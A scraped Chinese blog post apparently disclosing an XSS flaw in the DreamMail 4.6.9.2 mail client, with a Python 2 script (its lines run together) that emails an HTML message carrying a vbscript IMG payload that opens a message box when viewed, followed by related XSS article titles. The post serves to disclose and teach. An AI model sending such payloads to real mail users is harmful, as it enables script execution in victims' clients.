转载请注明:@小五义http://www.cnblogs.com/xiaowuyi

针对版本: DreamMail 4.6.9.2
测试环境:windows xp sp3

python版本:2.6

测试邮箱:126.com

#-*- coding:UTF-8 -*-

#@小五义 http://www.cnblogs.com/xiaowuyi

import smtplib, urllib2payload = '''<IMG SRC='vbscript:msgbox("Hello world!")'>'''def sendMail(toemail, smtpsrv, username, password):msg  = "From: XXXX@126.com\n"msg += "To:YYYY@126.com\n"msg += 'Date: Today\r\n'msg += "Subject: XSS payload\n"msg += "Content-type: text/html\n\n"msg += payload + "\r\n\r\n"server = smtplib.SMTP()server.connect(smtpsrv)server.login(username,password)try:server.sendmail(username, toemail, msg)except Exception, e:print "[-] Failed to send email:"print "[*] " + str(e)server.quit()username = "XXXX@126.com" #也可使用其它邮件服务器
password = "XXXXX"  #密码
toemail = "YYYY@126.com"
smtpsrv  = "smtp.126.com"print "[*] Sending Email"
sendMail(toemail, smtpsrv, username, password)

发送成功后,当用dreammail浏览该邮件时,会弹窗提示,如下:

该博文仅供学习交流。

转载于:https://www.cnblogs.com/xiaowuyi/p/3281259.html

Dreammail V4.6.9.2 XSS漏洞利用相关推荐

  1. xss漏洞利用方式总结

    目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...

  2. XSS漏洞利用---PHPMyWind 任意密码重置漏洞

    [漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...

  3. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

  4. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

  5. XSS漏洞利用之cookie获取

    目录 环境搭建 盗取cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是 ...

  6. XSS漏洞利用——键盘记录

    实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一.在服务器创建一个keylog.php文件 ...

  7. 搭建HTTPS XSS漏洞利用平台

    目录 功能: 升级方式:

  8. web漏洞利用---XSS注入攻击

    XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所 ...

  9. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

最新文章

  1. lua入门1 helloworld
  2. 数据变异性的度量 - 极差、IQR、方差和标准偏差
  3. PHP: chr和pack、unpack那些事
  4. 在 BT5 下对 Red Hat Enterprise Linux 5.4 的一次***测试
  5. SQLServer 2005 XML 在 T-SQL 查询中的典型应用[转]
  6. cornerMinEigenVal函数
  7. 剑桥毕业之后创业的可能的在商学院的出路
  8. AndroidOrientation Sensor(方向传感器),新的替代方法详解(安卓官方提供)
  9. oracle删除本地文件权限,使用 UNIX 权限保护文件
  10. Linux入门(一)之权限指令系统管理
  11. Linux启动提示Kernel panic - not syncing: Attempted to kill init解决办法
  12. 基于用户击键特征的身份鉴别系统
  13. mysql sqlyog讲解_详细讲解如何用SQLyog来分析MySQL数据库
  14. 搜狗拼音输入发-自定义短语记录
  15. 苹果手机不支持网易云音乐服务器,为什么我的苹果手机总是打不开网易云音乐。...
  16. Openlayers3中如何优雅的表示等值面
  17. 五大领域总目标指南_五大领域总目标记忆口诀
  18. Ajax+GridView+Xml的简易留言薄
  19. 使用ShareX+sm.ms实现截图后自动上传图片至图床
  20. WAF应用防火墙的功能

热门文章

  1. BaseRpm 机械角度 电角速度
  2. 计算机软件与理论英文怎么说,西安电子科技大学计算机软件与理论怎么样
  3. 飞思卡尔 加密 解密 MC9S12G128
  4. Unity 使用OpenXR和XR Interaction Toolkit 开发 HTCVive(Vive Cosmos)
  5. 用递归实现简单的进制转化器(模块化设计):学习递归题型之一
  6. 【系统分析师】系统配置与性能评价
  7. Omni Recover for Mac(苹果手机数据恢复软件)
  8. ffmpeg播放器(二)音频解码与播放
  9. java毕业设计小型酒店管理系统源码+lw文档+mybatis+系统+mysql数据库+调试
  10. K均值(K-means)聚类算法原理与代码详解